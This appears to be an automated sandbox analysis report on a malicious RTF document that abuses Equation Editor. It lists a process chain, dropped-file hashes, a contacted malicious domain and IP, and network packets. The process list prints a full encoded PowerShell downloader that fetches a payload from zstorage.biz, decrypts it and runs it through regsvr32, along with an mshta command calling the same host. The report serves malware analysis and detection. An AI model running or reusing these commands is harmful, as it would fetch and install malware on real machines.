Is malicious

Simulations

Behavior and APIs

Time	Type	Description
22:21:14	API Interceptor	114x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
22:21:15	API Interceptor	7x Sleep call for process: EQNEDT32.EXE modified from: 60000ms to: 500ms
22:21:16	API Interceptor	80x Sleep call for process: mshta.exe modified from: 60000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

Startup

System is w7

WINWORD.EXE (PID: 3116 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\5ZFXLxew8B.rtf MD5: 5D798FF0BE2A8970D932568068ACFD9D)

EQNEDT32.EXE (PID: 3172 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

mshta.exe (PID: 3196 cmdline: mshta https://zstorage.biz/read.txt & XXXXXX C MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

powershell.exe (PID: 3488 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWgBlAHIAbwBzADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4ASQBWACAAPQAgACQAbgBnAEMAbQBJAHcAWQBbADAALgAuADEANQBdADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAE0AVABZADUAUgBqAEoARwBNAEQAZABGAFEAVQBSAEcAUgBEAFUAegBNAEQASQB3AE4AagBKAEMATQBFAFkAMQBSAGsAVQAxAE0AMABKAEMATgB6AFEAPQAnACkAOwAkAHcANgBxAFoAVwBTAGYAZgAgAD0AIAAkAGoAMQBaAFMASwBWAEUARAAzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApADsAJABnAHEAQQAgAD0AIAAkAHcANgBxAFoAVwBTAGYAZgAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAG4AZwBDAG0ASQB3AFkALAAgADEANgAsACAAJABuAGcAQwBtAEkAdwBZAC4ATABlAG4AZwB0AGgAIAAtACAAMQA2ACkAOwAkAHMAbAAgAD0AKABbAGMAaABhAHIAXQA5ADIAKQA7ACQAZgBmACAAPQAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACAAKwAgACQAcwBsACAAKwAgAC0AagBvAGkAbgAgACgAKAA2ADUALgAuADkAMAApACAAKwAgACgAOQA3AC4ALgAxADIAMgApACAAfAAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEMAbwB1AG4AdAAgADEAMAAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApACAAKwAgACcALgB0AHgAdAAnADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAGYAZgAsACAAJABnAHEAQQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBmACkAIAB7ACQAbQBpACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAgACsAIAAkAHMAbAA7ACQAZQAyACAAPQAgACcAcgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAJwA7AGkAZgAgACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADQAKQAgAHsAIAAkAG0AaQAgAD0AIAAkAG0AaQAgACsAIAAnAFMAeQBzAHQAZQBtADMAMgAnACAAKwAgACQAcwBsACAAKwAgACQAZQAyADsAfQAgAGUAbABzAGUAIAB7ACAAJABtAGkAIAA9ACAAJABtAGkAIAArACAAJwBTAHkAcwBXAE8AVwA2ADQAJwAgACsAIAAkAHMAbAAgACsAIAAkAGUAMgA7AH0AJAB4ADAAPQAoAFsAYwBoAGEAcgBdADMANAApADsAJABhAHIAZwAxACAAPQAgACcALwBzACAAJwAgACsAIAAkAHgAMAAgACsAIAAkAGYAZgAgACsAIAAkAHgAMAA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAkAG0AaQAgACQAYQByAGcAMQA7AH0A' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

regsvr32.exe (PID: 3576 cmdline: 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt' MD5: 432BE6CF7311062633459EEF6B242FB5)

msxsl.exe (PID: 3904 cmdline: unknown MD5: 3E9F31B4E2CD423C015D34D63047685E)

cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\CabBEE5.tmp
File Type:	Microsoft Cabinet archive data, 53978 bytes, 1 file
MD5:	03F9E1F45C0D5FE8E08AF7449BA1FA2F
SHA1:	DA545C3133A914434CCE940BAE78D8AD180A529A
SHA-256:	677FFB54BD3CC0E2E66ECCAF2F6E6C8E1050286516E4F2EF984A3A3673CCC311
SHA-512:	12B7B857EEF3EE3672A57B64178737FDD560340DE34627E09DCF81B910E502DCF1C4E6D42C4A2D9B47A82D061CE71213A985DB4DFEBA04497DE3C91B6688CF02
Malicious:	false
Reputation:	low

C:\Users\HERBBL~1\AppData\Local\Temp\TarBEE6.tmp
File Type:	data
MD5:	4479A52B31B6BDE89384FB63854EC382
SHA1:	71386477836E4081BEFB501A266CCC4C984030E0
SHA-256:	8C0F5D09CF41E38CF161B6CDD1C3A76CEC845B7C11DB267AB800EDABF1A23FB2
SHA-512:	6CB248D315B0A27A88CBA9E73352F0627C5C7D94E9B5C0A934D5A1DD7BCB4239B8070FEDCCE9E7D84B2469D6CFB3BC29DB2A14B65FD9CBE52DBFE093CF6E6F30
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
File Type:	Microsoft Cabinet archive data, 53978 bytes, 1 file
MD5:	03F9E1F45C0D5FE8E08AF7449BA1FA2F
SHA1:	DA545C3133A914434CCE940BAE78D8AD180A529A
SHA-256:	677FFB54BD3CC0E2E66ECCAF2F6E6C8E1050286516E4F2EF984A3A3673CCC311
SHA-512:	12B7B857EEF3EE3672A57B64178737FDD560340DE34627E09DCF81B910E502DCF1C4E6D42C4A2D9B47A82D061CE71213A985DB4DFEBA04497DE3C91B6688CF02
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
File Type:	data
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
File Type:	data
MD5:	8147D73000106E874852F227A858AF6A
SHA1:	FBA3B6012576258914D5DD717B643B4C1C16B116
SHA-256:	95B3E04F7CFB40619CD6B28229A96387157A09EB5791D9EE52862106CECD5114
SHA-512:	D170722E20832D1B6FD45BD70E14DB52E82E3E2799CA64C9901CB337AEDB23464FC5A907C1334E853A1440E351C180302C1B556AF229FA32F8783938B7923FB7
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
File Type:	data
MD5:	517860262B99FC8314D56B0339281D28
SHA1:	BDD9DB586F9CA40F602C0492062DB8C23DCEA89F
SHA-256:	02AC0F1A023758EB0CC79AA0422953AADBCA74129E2DDEFC6C7A70C2D0442D23
SHA-512:	B0B82091F3FDDF9E8DA9707AE3D1A683B031356A55A3E326A11B575AAB825112CE7610FCB3E97B23842AF957E783012F9024DA5EE4E66617788BC8DAAAFBBB1D
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
File Type:	data
MD5:	7E14F6E2509F10C521DB151151FC1526
SHA1:	0D663DBA8CD886C878242EF7D1463A6F7EFE68D9
SHA-256:	AEEB094C17C58DCA23455C39DB9DB8292277B845358A78D5923BCC7B1F935391
SHA-512:	46076668788805E0B7C75C562B5677CC37009555343DFAED7BC59620DC43EC94D54F25D207DA05469DCC5E1B0546915C5717853BB1629CF4C15E59B69588857A
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
File Type:	data
MD5:	C37EE3BDFA4B2A4A130CF2B14CE88E21
SHA1:	DA03C4961AB217C32BEFC9656EE60D07DC99688C
SHA-256:	040064986D6A927CF44EC2DA7822FCF6E90129C8C17755772CC14B5B1383E706
SHA-512:	CA36C2E25FD1B09B3ABFDD12D6F7D0CE9939B99DE33F7CBA20AA9B04CA16B364215DA8A86C53B976AED05A0FD0E5A923A168A6921E43927F09571900CC110151
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
File Type:	data
MD5:	EE9344A24FA2782463E441573AB73BB1
SHA1:	7FD79FAB8DBD9662E56A41B19752DBED6CCD0226
SHA-256:	B05421186CDF0C2B47A9C6524CC577ABCD424EE94A3815F399446BB1AA32E455
SHA-512:	AFEE4B584B7A7957FAAFB91E617F968C6820789097002E2AF3B78AAC44BD305C13886D7589CCEAFD601B74B8C44297453184CCCF3DB1C9095E1732B57487841A
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\read[1].txt
File Type:	ASCII text, with very long lines, with no line terminators
MD5:	065F69B63DA189E3267922AB7039B83E
SHA1:	CFC1F5660D73CFEFE33AF308D9CC0BA1D9862227
SHA-256:	4282AEFD49EB7E671D0CA1254FB5536C94EF7206C58F303227ADC0CE6FA0674D
SHA-512:	0FF1B0CEFEFD88C6B37967C0F529290517ADC18E32B25B1187ED92F21F531E60CED12A46647220D60066AD8365DC60CAF8B7B297279765B7AF65885F5840536C
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0C4C5AB6-368E-452E-AB7C-1439E5127D20}.tmp
File Type:	data
MD5:	ABF750A0EB5EE0935E5CCD053AB53285
SHA1:	4566B0AEFDF4C317D660545FA3E9A45918E14CFB
SHA-256:	F0710AC533828A0F55080AA1979BAD43717CE3D7711675F2728B01E27CE06D91
SHA-512:	A77AC5A43981FDAF66C112446647D7A0F1EA4171CDB7D99C9B8736821D200CC78F7E059EE4B76304FBEA2FFBEADED9808A1F7D35B3726E00695BAE41A3E1BB3B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{89A6FBAF-0B2D-4551-A9E9-8FF6D76194A0}.tmp
File Type:	data
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt
File Type:	PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
MD5:	25EDE508DCE10342D52B72AAA2F35D3E
SHA1:	DF675DC60BFF41562CC67F52AE8BB7EA203A9791
SHA-256:	5995821AAF9016ACECAD0E497527660FA7C38CEA8B2A92BCB6F592F6F68A941C
SHA-512:	879D0F36B8B33CAD6751BD675F19A463C944ECAEFD73BCB7FBA18B327E344A32F0D8BEF7EEAEB0DDE8D8BBCB46A186BD443028966C31330BC95BE83345BEA058
Malicious:	true
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\6B05525E026EF66C.js
File Type:	ASCII text, with very long lines, with no line terminators
MD5:	690EFEF118574F7CFF610DDDA6AE09D7
SHA1:	4E3FDE66A13E8F0DFC0FC003890A446FD5AA2575
SHA-256:	A53CEA475983F012D0ABCCFDCD7A6176E685EE47434A0FAE7E3037C5BEA0CF5E
SHA-512:	DF80A7FDABC2E96BC5A8C547348AF3824D304B7EC9391A3C8A09C694A854666F383AD32DE209DC3B58FCD890A0C23A3A87893C90532FC5A4F763E28C412A5726
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\CAF9DEB8F.txt
File Type:	XML document text (XSL stylesheet)
MD5:	72619328D03D69D9463733C2C7F0587B
SHA1:	B992BC8CDBC446B7FAF97E8E1D4B31492ADBB6E8
SHA-256:	A54F29A819C3A4B6453EB96574678F0E646F154D290DB27BCEC650E5ED1474D3
SHA-512:	BF5ED0773EE4914C6A7788EC88224F6657C82B82204F08911F6A5296B3BA080BE0B38DB97C77259D64C0F61BE31EEE033D91ABA90A0FF8B136DE9A4690E38B55
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\D32E4DB3961AD18.txt
File Type:	XML document text
MD5:	613F129EEE78D2909C2E27E03E822B2E
SHA1:	3F171D9533508AC7CAA17F89707C6BF70BA731AD
SHA-256:	41CCDE839145A1283018F9AFBC1A401CF4A0BE90ACDEE1075D3E43EE4DDB9EE9
SHA-512:	B9AC265CB329CD4EA0A35DF4B0B4208EDD1FAF312DAAE1F0955E578908F427F870C4B5E9A61116173790B48957E50759A929AD0709B7940E402646D6BA9E0330
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\5ZFXLxew8B.LNK
File Type:	MS Windows shortcut
MD5:	2DED2FC3ECE3F21DF267604549DFD3AE
SHA1:	3EF13A6A7082BB317121F867C8FD844B0954E1CD
SHA-256:	E38FF9D3EF8EEDADFCDA10055DB5DF0120D2E3DE6CE8F00A32DD7A2026869FFB
SHA-512:	BCD9E38324203860BF472968783A6A0E1CA1CD5DAD6C51441C5D70DFDD71DC41C85F2A6959AAB688AFC48BBB724F66F4B01E32AA41939FAC0485BE765C23D649
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:	data
MD5:	D69CD2FC4C1C0CDADA9935EB317CE2C8
SHA1:	28383322371B51297F0146A9F348CDCB63BF438A
SHA-256:	0288A8DD53C0BBD4828C49233E6C112642A6C23454FE0C9D93CF59A0C8FE1BB6
SHA-512:	72C89B8671F5362A285A87B170B28C19D4BD37A7E01640FA14A3C63FF3E6EA32470DF3082000A53725E1297F197100C40160BD7506606C84CBB5B89D4874550D
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:	data
MD5:	FF291ADF1F74826EE3AA31EA36ADEC1C
SHA1:	9E647BCB57789C91D08C9B02D73ECD048239B5C5
SHA-256:	08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
SHA-512:	A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PA8JKBEMXPATQIYLTXQW.temp
File Type:	data
MD5:	1DEBA76CE234511BD19B8817E3CF2344
SHA1:	8F7C9C510D2AEA064DF668832789B3C72F306EAF
SHA-256:	6257ADD6E8E4FB6BAED9DF392FA5D667E938E6141CA013B660D0F3C47BC3C9B1
SHA-512:	D44487A935629CE89D18B6B90203EA65161F9B8C6B3540EDFADC43A496B97F5ACD7759AC677D081444E931EA253FCEA055631C72615617F18CCF9AC226E5F667
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe
File Type:	PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:	3E9F31B4E2CD423C015D34D63047685E
SHA1:	8B516E7BE14172E49085C4234C9A53C6EB490A45
SHA-256:	35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7
SHA-512:	CF36D14671D16B0F083FF85907661E045C00DCCE46168F26188E22494EB7DD201614DDB1EA8CB82A87604C579AB4067710744B317EB6FF27C0E1A9C5CD8356C0
Malicious:	true
Reputation:	low

C:\Users\user\Desktop\~$FXLxew8B.rtf
File Type:	data
MD5:	FF291ADF1F74826EE3AA31EA36ADEC1C
SHA1:	9E647BCB57789C91D08C9B02D73ECD048239B5C5
SHA-256:	08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
SHA-512:	A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
Malicious:	false
Reputation:	low

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection
zstorage.biz	185.82.23.166	true	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	Flag	ASN	ASN Name	Malicious
185.82.23.166	Germany		44066	DE-FIRSTCOLOwwwfirst-colonetDE	true

Static File Info

General
File type:	Rich Text Format data, version 1, ANSI
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	5ZFXLxew8B.rtf
File size:	8020
MD5:	11f71f387e87bbb2b97b6c27f78320e4
SHA1:	0beb1e04f2f6bb1246631cd0b5595ae99b103fbe
SHA256:	2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507
SHA512:	4ff6fc7a43ac67797131fee3d28c9522631349c4d0c32460257ac6829df9e266cbbc632e73f7c7e9d96511dabe8a9d5eda686f98ac73536d14c3466ccae9eaf7
File Content Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033.{\info{\author Admin}{\operator Admin}.{\creatim\yr2017\mo11\dy21\hr1\min5}{\revtim\yr2017\mo11\dy21\hr1\min6}{\version1}{\edmins1}{\nofpages1}{\nofwords0}{\nofchars1}{\*\company }{\nofcharsws1}{\vern4

File Icon

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2017 22:21:26.860404968 MEZ	63266	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:21:27.028328896 MEZ	53	63266	8.8.8.8	192.168.2.2
Nov 21, 2017 22:21:27.093183041 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:21:27.093205929 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:21:27.093307972 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:21:27.147423029 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:21:27.147437096 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:03.258713961 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:03.258733988 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:03.258742094 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:03.258949041 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:03.356493950 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:03.356724024 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:03.526797056 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:03.526813030 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:03.779476881 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:03.779623032 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:04.026335001 MEZ	51113	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:04.204513073 MEZ	53	51113	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:04.214704037 MEZ	61861	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:04.353858948 MEZ	53	61861	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:04.892246962 MEZ	61843	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:05.202033043 MEZ	53	61843	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:05.213591099 MEZ	59991	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:05.322488070 MEZ	53	59991	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:07.046863079 MEZ	55271	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:07.417412996 MEZ	53	55271	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:07.428297997 MEZ	56842	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:07.567926884 MEZ	53	56842	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:07.941570997 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:07.941605091 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.182784081 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.182802916 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.182811022 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.183054924 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:08.209917068 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.209937096 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.209944963 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.210310936 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:08.221075058 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.221093893 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.221101046 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.221324921 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:08.275650024 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.275669098 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.275688887 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.275902033 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:08.383807898 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.383826017 MEZ	443	49164	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:08.384145021 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:10.226366043 MEZ	53440	53	192.168.2.2	8.8.8.8
Nov 21, 2017 22:22:10.395776987 MEZ	53	53440	8.8.8.8	192.168.2.2
Nov 21, 2017 22:22:10.414540052 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:10.414562941 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:10.414654016 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:10.479974031 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:10.479989052 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:10.489058971 MEZ	49164	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:10.869244099 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:10.869261980 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:10.869508982 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:10.903955936 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:10.903984070 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.233279943 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.412101030 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.412116051 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.699610949 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.699630976 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.699639082 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.699767113 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.704679012 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.704699993 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.704708099 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.704838991 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.714962006 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.714982033 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.714991093 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.715121984 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.735500097 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.750138998 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.750159025 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.750166893 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.750298977 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.763828039 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.763849020 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.763855934 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.763946056 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.765490055 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.765506983 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.765513897 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.765604973 MEZ	49168	443	192.168.2.2	185.82.23.166
Nov 21, 2017 22:22:11.833149910 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.833167076 MEZ	443	49168	185.82.23.166	192.168.2.2
Nov 21, 2017 22:22:11.833173990 MEZ	443	49168	185.82.23.166	192.168.2.2
